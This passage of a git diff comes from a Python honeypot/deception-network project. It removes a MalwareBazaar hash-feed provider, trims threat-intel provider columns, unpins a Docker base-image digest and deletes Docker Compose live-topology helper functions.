    global _mal_hash_singleton, _mal_hash_initialized
    _mal_hash_singleton, _mal_hash_initialized = None, False
|
||||
|
||||
|
||||
def get_intel_providers() -> List[IntelProvider]:
|
||||
"""Return the configured threat-intel providers.
|
||||
|
||||
|
||||
@@ -13,6 +13,7 @@ of attacker IPs map to a single network round-trip per refresh window.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import time
|
||||
from datetime import datetime, timezone
|
||||
from typing import Any, Optional
|
||||
@@ -92,22 +93,16 @@ class FeodoProvider(IntelProvider):
|
||||
verdict=None, # absence ≠ "benign", let other providers speak
|
||||
column_updates={
|
||||
"feodo_listed": False,
|
||||
"feodo_malware_family": None,
|
||||
"feodo_raw": {},
|
||||
"feodo_raw": "{}",
|
||||
"feodo_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
family_obj = entry.get("malware")
|
||||
family = (
|
||||
family_obj if isinstance(family_obj, str) and family_obj else None
|
||||
)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict="malicious",
|
||||
column_updates={
|
||||
"feodo_listed": True,
|
||||
"feodo_malware_family": family,
|
||||
"feodo_raw": entry,
|
||||
"feodo_raw": json.dumps(entry),
|
||||
"feodo_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -25,6 +25,7 @@ Status code semantics:
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
@@ -70,9 +71,7 @@ class GreyNoiseProvider(IntelProvider):
|
||||
verdict="unknown",
|
||||
column_updates={
|
||||
"greynoise_classification": "unknown",
|
||||
"greynoise_name": None,
|
||||
"greynoise_tags": [],
|
||||
"greynoise_raw": {"message": "not seen"},
|
||||
"greynoise_raw": json.dumps({"message": "not seen"}),
|
||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
@@ -89,25 +88,12 @@ class GreyNoiseProvider(IntelProvider):
|
||||
|
||||
classification = (data.get("classification") or "unknown").lower()
|
||||
verdict = _CLASSIFICATION_TO_VERDICT.get(classification, "unknown")
|
||||
# The Community endpoint surfaces an actor ``name`` (e.g. "Tor",
|
||||
# "Censys") but no behavioral tag list — the tag taxonomy is
|
||||
# paid-tier only. Persist whatever we got; a future non-Community
|
||||
# provider may populate ``greynoise_tags``.
|
||||
name_obj = data.get("name")
|
||||
name = name_obj if isinstance(name_obj, str) and name_obj else None
|
||||
tags_obj = data.get("tags")
|
||||
tags: list[str] = (
|
||||
[t for t in tags_obj if isinstance(t, str)]
|
||||
if isinstance(tags_obj, list) else []
|
||||
)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict=verdict,
|
||||
column_updates={
|
||||
"greynoise_classification": classification,
|
||||
"greynoise_name": name,
|
||||
"greynoise_tags": tags,
|
||||
"greynoise_raw": data,
|
||||
"greynoise_raw": json.dumps(data),
|
||||
"greynoise_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -1,195 +0,0 @@
|
||||
"""MalwareBazaar bad-hash provider — bulk SHA-256 feed.
|
||||
|
||||
Mirrors :mod:`decnet.intel.feodo` for the refresh / TTL / set-membership
|
||||
shape, but operates on the SHA-256 keyspace instead of IPs and so
|
||||
implements :class:`decnet.intel.base.MalHashProvider` rather than
|
||||
:class:`IntelProvider`. Keep the two ABCs disjoint — see ``base.py``.
|
||||
|
||||
Endpoint: ``GET https://bazaar.abuse.ch/export/csv/full/`` with
|
||||
``Auth-Key: <key>`` header. Returns a ZIP'd CSV with one row per
|
||||
sample; the ``sha256_hash`` column is the natural key. ~900K rows ≈
|
||||
30 MB resident as a ``set[str]`` of hex-lowercased hashes.
|
||||
|
||||
Auth-key is read from ``DECNET_MALWAREBAZAAR_AUTH_KEY``. When unset,
|
||||
the provider logs one warning at first refresh attempt and disables
|
||||
itself for the process lifetime — :meth:`is_known_bad` returns ``False``
|
||||
without ever making a network call. The ingester treats that the same
|
||||
as "no opinion," so R0046's ``mal_hash_match`` lane stays absent on the
|
||||
bus payload (which is exactly what the predicate's ``is True`` check
|
||||
does today, so the silent-no-op is behaviorally identical to "lane not
|
||||
shipped yet").
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import csv
|
||||
import io
|
||||
import os
|
||||
import time
|
||||
import zipfile
|
||||
from typing import Optional
|
||||
|
||||
from decnet.intel.base import MalHashProvider
|
||||
from decnet.logging import get_logger
|
||||
from decnet.net.http import stealth_client
|
||||
|
||||
log = get_logger("intel.mal_hash")
|
||||
|
||||
_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
|
||||
_DEFAULT_REFRESH_S = 86_400.0 # 24h — feed is daily, no need to hammer
|
||||
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
|
||||
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
|
||||
|
||||
|
||||
def _read_refresh_interval() -> float:
    """Return the feed refresh interval in seconds from the environment.

    Reads ``_REFRESH_INTERVAL_ENV``; when the variable is unset, is not
    parseable as a float, or parses to NaN / a negative number, the default
    ``_DEFAULT_REFRESH_S`` is returned (with a warning for the invalid
    cases).
    """
    raw = os.environ.get(_REFRESH_INTERVAL_ENV)
    if raw is None:
        return _DEFAULT_REFRESH_S
    try:
        value = float(raw)
    except ValueError:
        log.warning(
            "%s=%r not a float; falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S
    # float() happily parses "nan" and "-5". NaN would make the staleness
    # comparison permanently false (the feed would never refresh again) and
    # a negative interval would force a full re-download on every lookup.
    # ``not value >= 0`` is true for both.
    if not value >= 0.0:
        log.warning(
            "%s=%r must be a non-negative number; falling back to default %.0f",
            _REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
        )
        return _DEFAULT_REFRESH_S
    return value
|
||||
|
||||
|
||||
class MalwareBazaarProvider(MalHashProvider):
    """Bulk SHA-256 lookup against MalwareBazaar's full export.

    The whole feed is downloaded, reduced to a ``set`` of lowercase hex
    hashes, and re-fetched once it is older than the refresh interval.
    Without an auth key the provider is permanently disabled and every
    lookup answers ``False`` without touching the network.
    """

    name = "malwarebazaar"

    def __init__(
        self,
        *,
        auth_key: Optional[str] = None,
        refresh_interval_s: Optional[float] = None,
    ) -> None:
        """Configure the provider.

        Args:
            auth_key: API key; falls back to the ``_AUTH_KEY_ENV``
                environment variable. An empty value counts as "no key".
            refresh_interval_s: Seconds between feed refreshes; falls back
                to ``_read_refresh_interval()`` when ``None``.
        """
        self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
        self._refresh_interval_s = (
            refresh_interval_s
            if refresh_interval_s is not None
            else _read_refresh_interval()
        )
        self._known: set[str] = set()
        # time.monotonic() stamp of the last successful load.
        self._loaded_at: float = 0.0
        self._last_error: Optional[str] = None
        # Ensures the "disabled" warning is emitted at most once.
        self._disabled_warned: bool = False

    @property
    def disabled(self) -> bool:
        """``True`` when no auth key is configured."""
        return self._auth_key is None

    async def _refresh(self) -> Optional[str]:
        """Refetch the bulk feed. Returns an error string or ``None``.

        On success the in-memory set and load timestamp are replaced; on
        any failure the previously loaded set is left untouched.
        """
        if self._auth_key is None:
            return "no auth key"
        try:
            async with stealth_client(timeout=60.0) as client:
                resp = await client.get(
                    _ENDPOINT, headers={"Auth-Key": self._auth_key},
                )
        except Exception as exc:  # noqa: BLE001
            return f"network: {exc}"
        if resp.status_code != 200:
            return f"HTTP {resp.status_code}"
        body = resp.content
        try:
            new_known = _parse_dump(body)
        except Exception as exc:  # noqa: BLE001
            return f"parse: {exc}"
        if not new_known:
            # An empty result is treated as a bad download rather than as
            # "no malware exists"; keep whatever was loaded before.
            return "feed: empty"
        self._known = new_known
        self._loaded_at = time.monotonic()
        self._last_error = None
        log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
        return None

    async def _ensure_fresh(self) -> None:
        """Refresh the feed when it is empty or older than the interval.

        Refresh failures are recorded in ``_last_error`` and logged, never
        raised.
        """
        if self.disabled:
            if not self._disabled_warned:
                log.warning(
                    "R0046 mal_hash_match disabled: %s unset",
                    _AUTH_KEY_ENV,
                )
                self._disabled_warned = True
            return
        # NOTE(review): while the set is still empty a failed refresh is
        # retried on every lookup (no back-off) — confirm that is intended.
        if (
            not self._known
            or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
        ):
            err = await self._refresh()
            if err:
                self._last_error = err
                log.warning("malwarebazaar refresh failed: %s", err)

    async def is_known_bad(self, sha256: str) -> bool:
        """Return whether *sha256* is in the loaded feed; never raises.

        A disabled provider and any non-string *sha256* (e.g. ``None`` from
        an observation without a hash) both answer ``False``.
        """
        # The ABC contract forbids raising; without the isinstance guard a
        # None hash would hit ``.lower()`` and blow up in the ingester.
        if self.disabled or not isinstance(sha256, str):
            return False
        try:
            await self._ensure_fresh()
        except Exception as exc:  # noqa: BLE001
            # Belt and braces: _ensure_fresh swallows refresh failures
            # but a bug in there shouldn't blow up the ingester payload.
            log.exception("malwarebazaar refresh raised: %s", exc)
            return False
        return sha256.lower() in self._known
|
||||
|
||||
|
||||
def _parse_dump(body: bytes) -> set[str]:
    """Turn a MalwareBazaar dump (zipped or plain CSV) into a set of hashes.

    A payload starting with the ZIP magic ``PK`` is opened as an archive and
    its first ``.csv`` member is used; anything else is taken to be the CSV
    itself. The bytes are decoded as UTF-8 (undecodable bytes replaced) and
    handed to ``_extract_hashes``, which does the per-row validation.

    Raises:
        ValueError: the archive contains no ``.csv`` member.
    """
    raw = body
    if body[:2] == b"PK":
        with zipfile.ZipFile(io.BytesIO(body)) as archive:
            member = next(
                (n for n in archive.namelist() if n.lower().endswith(".csv")),
                None,
            )
            if member is None:
                raise ValueError("zip has no .csv member")
            raw = archive.read(member)
    return _extract_hashes(raw.decode("utf-8", errors="replace"))
|
||||
|
||||
|
||||
def _extract_hashes(text: str) -> set[str]:
    """Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.

    Blank and ``#``-prefixed lines are not data. The column is located, in
    order of preference, from:

    1. an uncommented header row (first data line) naming ``sha256_hash``;
    2. a ``#``-commented header line naming ``sha256_hash``
       (NOTE(review): the published dump appears to ship its header this
       way — confirm against a live download);
    3. column 0 as a last resort, so an upstream rename still yields
       something rather than silently emptying the set.

    The first data line is only skipped when it really is a header; a
    headerless dump therefore keeps its first hash. Values are lowercased,
    and anything that is not exactly 64 hex digits is dropped.
    """
    hex_digits = frozenset("0123456789abcdef")

    def _clean(cell: str) -> str:
        return cell.strip().strip('"').lower()

    def _header_column(row: list[str]) -> int | None:
        """Index of ``sha256_hash`` in *row*, or ``None`` if not a header."""
        names = [_clean(cell) for cell in row]
        return names.index("sha256_hash") if "sha256_hash" in names else None

    col: int | None = None
    data_lines: list[str] = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.startswith("#"):
            # A commented-out header still tells us where the column lives.
            if col is None:
                candidate = stripped.lstrip("#").strip()
                if candidate:
                    parsed = next(
                        csv.reader([candidate], skipinitialspace=True), [],
                    )
                    col = _header_column(parsed)
            continue
        data_lines.append(line)

    # csv.reader handles the quoting (e.g. commas inside a quoted field);
    # skipinitialspace tolerates ``", "`` separators.
    reader = csv.reader(data_lines, skipinitialspace=True)
    first = next(reader, None)
    if first is None:
        return set()

    header_col = _header_column(first)
    if header_col is not None:
        col = header_col
    elif col is None:
        col = 0

    def _rows():
        # Re-emit the first line when it turned out to be data, not header.
        if header_col is None:
            yield first
        yield from reader

    out: set[str] = set()
    for row in _rows():
        if len(row) <= col:
            continue
        cell = _clean(row[col])
        if len(cell) == 64 and hex_digits.issuperset(cell):
            out.add(cell)
    return out
|
||||
@@ -12,6 +12,7 @@ caps requests/min — the provider works either way.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import os
|
||||
from datetime import datetime, timezone
|
||||
from typing import Optional
|
||||
@@ -70,10 +71,7 @@ class ThreatFoxProvider(IntelProvider):
|
||||
verdict=None, # absence is not a benign signal
|
||||
column_updates={
|
||||
"threatfox_listed": False,
|
||||
"threatfox_threat_types": [],
|
||||
"threatfox_ioc_types": [],
|
||||
"threatfox_malware_families": [],
|
||||
"threatfox_raw": {},
|
||||
"threatfox_raw": "{}",
|
||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
@@ -85,37 +83,12 @@ class ThreatFoxProvider(IntelProvider):
|
||||
|
||||
data = payload.get("data") or []
|
||||
listed = bool(data)
|
||||
# Each match in ``data`` carries threat_type / ioc_type / malware
|
||||
# (canonical family). The IntelLifter dispatches ATT&CK techniques
|
||||
# off ``threat_type`` (botnet_cc / payload_delivery / payload /
|
||||
# cc_skimming); the other two columns are evidence and SIEM
|
||||
# context. Sets are flattened across matches and serialised
|
||||
# sorted for determinism.
|
||||
threat_types: set[str] = set()
|
||||
ioc_types: set[str] = set()
|
||||
families: set[str] = set()
|
||||
if isinstance(data, list):
|
||||
for entry in data:
|
||||
if not isinstance(entry, dict):
|
||||
continue
|
||||
tt = entry.get("threat_type")
|
||||
if isinstance(tt, str) and tt:
|
||||
threat_types.add(tt)
|
||||
it = entry.get("ioc_type")
|
||||
if isinstance(it, str) and it:
|
||||
ioc_types.add(it)
|
||||
family = entry.get("malware") or entry.get("malware_printable")
|
||||
if isinstance(family, str) and family:
|
||||
families.add(family)
|
||||
return IntelResult(
|
||||
provider=self.name,
|
||||
verdict="malicious" if listed else None,
|
||||
column_updates={
|
||||
"threatfox_listed": listed,
|
||||
"threatfox_threat_types": sorted(threat_types),
|
||||
"threatfox_ioc_types": sorted(ioc_types),
|
||||
"threatfox_malware_families": sorted(families),
|
||||
"threatfox_raw": data,
|
||||
"threatfox_raw": json.dumps(data),
|
||||
"threatfox_queried_at": datetime.now(timezone.utc),
|
||||
},
|
||||
)
|
||||
|
||||
@@ -59,38 +59,6 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
|
||||
return None
|
||||
|
||||
|
||||
def _build_intel_event_payload(
    attacker_uuid: str,
    ip: str,
    row: dict[str, Any],
    providers: list[IntelProvider],
) -> dict[str, Any]:
    """Project an AttackerIntel row into the intel bus event.

    The event is the one the TTP worker consumes as ``source_kind="intel"``.
    It carries the attacker identity, the aggregate verdict, the names of
    the providers, and a fixed selection of per-provider columns read from
    *row*. List-valued columns that are missing or falsy become ``[]``;
    scalar columns are passed through as-is (``None`` when absent).
    """
    # (column, is_list) in the order the keys appear in the event.
    columns = (
        # AbuseIPDB
        ("abuseipdb_score", False),
        ("abuseipdb_categories", True),
        # GreyNoise
        ("greynoise_classification", False),
        ("greynoise_name", False),
        ("greynoise_tags", True),
        # Feodo
        ("feodo_listed", False),
        ("feodo_malware_family", False),
        # ThreatFox
        ("threatfox_listed", False),
        ("threatfox_threat_types", True),
        ("threatfox_ioc_types", True),
        ("threatfox_malware_families", True),
    )
    payload: dict[str, Any] = {
        "attacker_uuid": attacker_uuid,
        "attacker_ip": ip,
        "aggregate_verdict": row.get("aggregate_verdict"),
        "providers": [p.name for p in providers],
    }
    for column, is_list in columns:
        value = row.get(column)
        payload[column] = (value or []) if is_list else value
    return payload
|
||||
|
||||
|
||||
async def _enrich_one(
|
||||
attacker_uuid: str,
|
||||
ip: str,
|
||||
@@ -204,9 +172,12 @@ async def run_intel_loop(
|
||||
await publish_safely(
|
||||
bus,
|
||||
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
|
||||
_build_intel_event_payload(
|
||||
attacker_uuid, ip, row, providers,
|
||||
),
|
||||
{
|
||||
"attacker_uuid": attacker_uuid,
|
||||
"attacker_ip": ip,
|
||||
"aggregate_verdict": row.get("aggregate_verdict"),
|
||||
"providers": [p.name for p in providers],
|
||||
},
|
||||
event_type=_topics.ATTACKER_INTEL_ENRICHED,
|
||||
)
|
||||
except Exception: # noqa: BLE001
|
||||
@@ -229,11 +200,11 @@ async def run_intel_loop(
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
|
||||
self.component = component
|
||||
|
||||
def filter(self, record: logging.LogRecord) -> bool:
|
||||
record.decnet_component = self.component
|
||||
record.decnet_component = self.component # type: ignore[attr-defined]
|
||||
return True
|
||||
|
||||
|
||||
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
|
||||
span = trace.get_current_span()
|
||||
ctx = span.get_span_context()
|
||||
if ctx and ctx.trace_id:
|
||||
record.otel_trace_id = format(ctx.trace_id, "032x")
|
||||
record.otel_span_id = format(ctx.span_id, "016x")
|
||||
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
|
||||
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
|
||||
else:
|
||||
record.otel_trace_id = "0"
|
||||
record.otel_span_id = "0"
|
||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
||||
except Exception:
|
||||
record.otel_trace_id = "0"
|
||||
record.otel_span_id = "0"
|
||||
record.otel_trace_id = "0" # type: ignore[attr-defined]
|
||||
record.otel_span_id = "0" # type: ignore[attr-defined]
|
||||
return True
|
||||
|
||||
|
||||
|
||||
@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
|
||||
services: list[str] = PydanticField(..., min_length=1)
|
||||
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
|
||||
base_image: str # Docker image for the base/IP-holder container
|
||||
build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
|
||||
build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles
|
||||
hostname: str
|
||||
archetype: str | None = None # archetype slug if spawned from an archetype profile
|
||||
service_config: dict[str, dict] = PydanticField(default_factory=dict)
|
||||
|
||||
@@ -101,10 +101,7 @@ async def mutate_decky(
|
||||
|
||||
try:
|
||||
# Wrap blocking call in thread
|
||||
cp = compose_path
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
|
||||
)
|
||||
await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
|
||||
except Exception as e:
|
||||
log.error("mutation failed decky=%s error=%s", decky_name, e)
|
||||
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
|
||||
@@ -164,8 +161,6 @@ async def mutate_all(
|
||||
if force or only is not None:
|
||||
due = True
|
||||
else:
|
||||
if interval_mins is None:
|
||||
continue
|
||||
elapsed_secs = now - decky.last_mutated
|
||||
due = elapsed_secs >= (interval_mins * 60)
|
||||
remaining = (interval_mins * 60) - elapsed_secs
|
||||
@@ -289,13 +284,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
|
||||
return 0
|
||||
drained = 0
|
||||
for topo in pending:
|
||||
tid = topo.id
|
||||
tid = topo["id"]
|
||||
try:
|
||||
await _deployer.resync_agent_topology(repo, tid)
|
||||
await repo.set_topology_resync(tid, False)
|
||||
drained += 1
|
||||
log.info("topology %s resynced to agent %s",
|
||||
tid, topo.target_host_uuid)
|
||||
tid, topo.get("target_host_uuid"))
|
||||
except Exception as exc: # noqa: BLE001
|
||||
log.warning(
|
||||
"topology %s resync failed (will retry): %s", tid, exc,
|
||||
@@ -410,11 +405,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
|
||||
t.cancel()
|
||||
if heartbeat_task is not None:
|
||||
heartbeat_task.cancel()
|
||||
for task in (*wake_tasks, heartbeat_task):
|
||||
if task is None:
|
||||
for t in (*wake_tasks, heartbeat_task):
|
||||
if t is None:
|
||||
continue
|
||||
with contextlib.suppress(asyncio.CancelledError, Exception):
|
||||
await task
|
||||
await t
|
||||
if bus is not None:
|
||||
with contextlib.suppress(Exception):
|
||||
await bus.close()
|
||||
|
||||
@@ -98,463 +98,6 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
|
||||
)
|
||||
|
||||
|
||||
async def _materialise_lan_change(
    repo: Any,
    topology_id: str,
    *,
    created: Optional[tuple[str, str, bool]] = None,
    removed: Optional[str] = None,
) -> None:
    """Create or remove the docker bridge for a live LAN op + re-render compose.

    Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
    write lands. Skips when:

    * the topology does not exist or is not active/degraded (a pending
      topology gets its networks created at deploy time),
    * the topology is pinned to a swarm agent (cross-host materialisation
      isn't implemented; the agent's apply_topology RPC re-renders the
      whole compose at next push).

    Any failure of the docker SDK / networking primitives — including
    creating the docker client itself — is logged and not re-raised: the
    DB row is the source of truth.

    Args:
        created: ``(lan_name, subnet, is_dmz)`` of a LAN to materialise; a
            non-DMZ LAN is created as an ``internal`` bridge.
        removed: name of a LAN whose bridge should be removed.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return
    if topology.status not in ("active", "degraded"):
        return
    if topology.target_host_uuid:
        _log.info(
            "live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
            topology_id,
        )
        return

    # Lazy imports — these pull in docker.py / network.py which both
    # require the docker SDK; keeping them out of module-import keeps
    # the mutator usable in test environments that stub docker.
    import docker
    from decnet.engine.deployer import _topology_compose_path
    from decnet.network import create_bridge_network, remove_bridge_network
    from decnet.topology.compose import _network_name, write_topology_compose

    client = None
    try:
        # Inside the guard: building the client can itself fail (e.g. the
        # daemon is unreachable), and that must not escape to the caller.
        client = docker.from_env()

        if created is not None:
            name, subnet, is_dmz = created
            net_name = _network_name(topology_id, name)
            try:
                create_bridge_network(
                    client, net_name, subnet, internal=not is_dmz,
                )
            except Exception as exc:  # noqa: BLE001
                _log.error(
                    "live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
                    topology_id, name, subnet, exc,
                )
                # Don't re-raise — the DB row is the source of truth.
                # Operator can retry by removing + re-adding the LAN.

        if removed is not None:
            net_name = _network_name(topology_id, removed)
            try:
                remove_bridge_network(client, net_name)
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live remove_lan: bridge remove failed topology=%s lan=%s: %s",
                    topology_id, removed, exc,
                )

        # Re-render compose so the file on disk matches the DB. Even
        # when the bridge create above failed, a future redeploy will
        # try to bring the network back from the compose definition.
        hydrated = await hydrate(repo, topology_id)
        if hydrated is not None:
            try:
                write_topology_compose(
                    hydrated, _topology_compose_path(topology_id),
                )
            except Exception as exc:  # noqa: BLE001
                _log.warning(
                    "live LAN op: compose re-render failed topology=%s: %s",
                    topology_id, exc,
                )
    except Exception as exc:  # noqa: BLE001 — outer net for any docker SDK failure
        _log.error(
            "live LAN materialisation crashed topology=%s: %s",
            topology_id, exc,
        )
    finally:
        # Release the client's connections; previously it was never closed.
        if client is not None:
            try:
                client.close()
            except Exception as exc:  # noqa: BLE001
                _log.debug(
                    "live LAN op: docker client close failed topology=%s: %s",
                    topology_id, exc,
                )
|
||||
|
||||
|
||||
def _is_buildx_wedge(exc: BaseException) -> bool:
    """Report whether *exc* carries both buildx wedge signatures.

    The searched text is the exception's ``stderr`` attribute (when it
    exists and is truthy) followed by ``str(exc)``, lower-cased. Both
    forms are consulted because ``_compose_with_retry`` raises a
    synthetic CalledProcessError whose ``stderr`` contains the recovery
    hint (which preserves the wedge signatures verbatim).

    Returns True only when BOTH ``_BUILDX_WEDGE_SIGNATURE`` and
    ``_BUILDX_EROFS_SIGNATURE`` occur in that text.

    NOTE(review): the haystack is lower-cased but the signatures are used
    as-is — this presumably relies on the constants being lower-case;
    confirm in ``decnet.engine.deployer``.
    """
    from decnet.engine.deployer import (
        _BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
    )

    captured = getattr(exc, "stderr", None)
    stderr_text = str(captured) if captured else ""
    haystack = " ".join((stderr_text, str(exc))).lower()
    return all(
        signature in haystack
        for signature in (_BUILDX_WEDGE_SIGNATURE, _BUILDX_EROFS_SIGNATURE)
    )
|
||||
|
||||
|
||||
async def _compose_up_with_buildkit_fallback(
    *args: str, compose_file, label: str,
) -> None:
    """Run a compose command; on a buildx wedge, retry once with the legacy builder.

    The first attempt calls ``_compose_with_retry(*args,
    compose_file=compose_file)`` in a worker thread. If it raises and
    ``_is_buildx_wedge`` recognises the failure, a warning is logged and
    the same command is run once more with ``env={"DOCKER_BUILDKIT":
    "0"}``. Any other exception from the first attempt propagates
    unchanged, as does any exception from the second attempt.

    Background: the buildx activity dir occasionally lands on a read-only
    mount; the legacy (non-buildx) builder doesn't use the activity dir
    and isn't affected.

    Args:
        *args: compose sub-command and its arguments.
        compose_file: forwarded to ``_compose_with_retry``.
        label: human-readable identifier used only in the warning line so
            an operator can grep the fall-back back to the originating op.
    """
    import anyio
    from decnet.engine.deployer import _compose_with_retry

    def _first_attempt():
        return _compose_with_retry(*args, compose_file=compose_file)

    try:
        await anyio.to_thread.run_sync(_first_attempt)
    except Exception as exc:  # noqa: BLE001
        if not _is_buildx_wedge(exc):
            raise
        _log.warning(
            "%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
            "(legacy builder). Recover the buildx state at your leisure: "
            "rm -rf ~/.docker/buildx/activity && "
            "docker buildx create --name decnet-builder --use --bootstrap",
            label,
        )
    else:
        return

    # The retry lives outside the except block so that, if it also blows
    # up, its traceback isn't nested under the first failure.
    def _legacy_builder_attempt():
        return _compose_with_retry(
            *args, compose_file=compose_file,
            env={"DOCKER_BUILDKIT": "0"},
        )

    await anyio.to_thread.run_sync(_legacy_builder_attempt)
|
||||
|
||||
|
||||
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
    """List the compose service names belonging to one decky.

    The result always starts with the base (``decky_name``), followed by
    ``"<decky_name>-<service>"`` for each entry of *services*, in order.

    Services whose registry entry has ``fleet_singleton`` set are left
    out — those run once fleet-wide and don't have a per-decky compose
    entry (the same filter is applied at compose-render time, see
    :mod:`decnet.topology.compose.generate_topology_compose`).

    A service name unknown to the registry (``get_service`` raises
    ``KeyError``) is deliberately kept, so that compose reports a clear
    "no such service" error instead of the name vanishing silently.
    """
    from decnet.services.registry import get_service

    targets = [decky_name]
    for svc_name in services:
        try:
            svc = get_service(svc_name)
        except KeyError:
            # Unknown to the registry: keep the target and let compose
            # surface the problem.
            skip = False
        else:
            skip = svc.fleet_singleton
        if not skip:
            targets.append(f"{decky_name}-{svc_name}")
    return targets
|
||||
|
||||
|
||||
async def _live_topology_or_none(
    repo: Any, topology_id: str,
) -> Optional[Any]:
    """Return the topology row only when it's eligible for live materialisation.

    The row is whatever ``repo.get_topology`` returns; it is read through
    attributes (``.status``, ``.target_host_uuid``), so it is an object,
    not a plain ``dict``.

    Returns None (so callers can skip with a single ``if`` check) when:

    * the topology doesn't exist;
    * status is not ``active`` or ``degraded`` (pending topologies get
      everything materialised at deploy time);
    * the topology is pinned to a swarm agent, i.e. ``target_host_uuid``
      is truthy (cross-host live editing is its own routing workstream).
      This case is logged at INFO level.
    """
    topology = await repo.get_topology(topology_id)
    if topology is None:
        return None
    if topology.status not in ("active", "degraded"):
        return None
    if topology.target_host_uuid:
        _log.info(
            "live decky op skipped (agent-pinned topology=%s); "
            "next agent push will reconcile",
            topology_id,
        )
        return None
    return topology
|
||||
|
||||
|
||||
async def _rerender_compose(repo: Any, topology_id: str) -> None:
    """Rewrite the per-topology compose file from the current DB state.

    Hydrates the topology and, when hydration yields something, writes it
    to the path given by ``_topology_compose_path(topology_id)``. Used
    after materialisation steps so the file on disk matches the topology
    rows.

    Soft-fails: an exception while writing is logged as a warning and
    swallowed, so it doesn't poison the DB-side mutation. An exception
    raised by ``hydrate`` itself is not caught here.
    """
    from decnet.engine.deployer import _topology_compose_path
    from decnet.topology.compose import write_topology_compose

    snapshot = await hydrate(repo, topology_id)
    if snapshot is not None:
        try:
            write_topology_compose(snapshot, _topology_compose_path(topology_id))
        except Exception as exc:  # noqa: BLE001
            _log.warning(
                "live op: compose re-render failed topology=%s: %s",
                topology_id, exc,
            )
|
||||
|
||||
|
||||
async def _materialise_decky_spawn(
    repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
    """Bring up one decky (base + services) with ``compose up -d --no-deps --build``.

    The compose file is re-rendered first so it lists the new decky.

    Returns:
        True when the compose command completed without raising.
        False when it raised (the failure is logged, not re-raised — the
        DB row is the source of truth), and also when the topology isn't
        eligible for live materialisation, so the caller doesn't flip the
        decky's state to ``running`` on the strength of a no-op.
    """
    live = await _live_topology_or_none(repo, topology_id)
    if live is None:
        return False

    from decnet.engine.deployer import _topology_compose_path

    await _rerender_compose(repo, topology_id)
    service_names = _decky_targets(decky_name, services)
    compose_file = _topology_compose_path(topology_id)
    try:
        await _compose_up_with_buildkit_fallback(
            "up", "-d", "--no-deps", "--build", *service_names,
            compose_file=compose_file,
            label=f"live add_decky topology={topology_id} decky={decky_name}",
        )
    except Exception as exc:  # noqa: BLE001
        _log.error(
            "live add_decky: compose up failed topology=%s decky=%s: %s",
            topology_id, decky_name, exc,
        )
        return False
    return True
|
||||
|
||||
|
||||
async def _materialise_decky_remove(
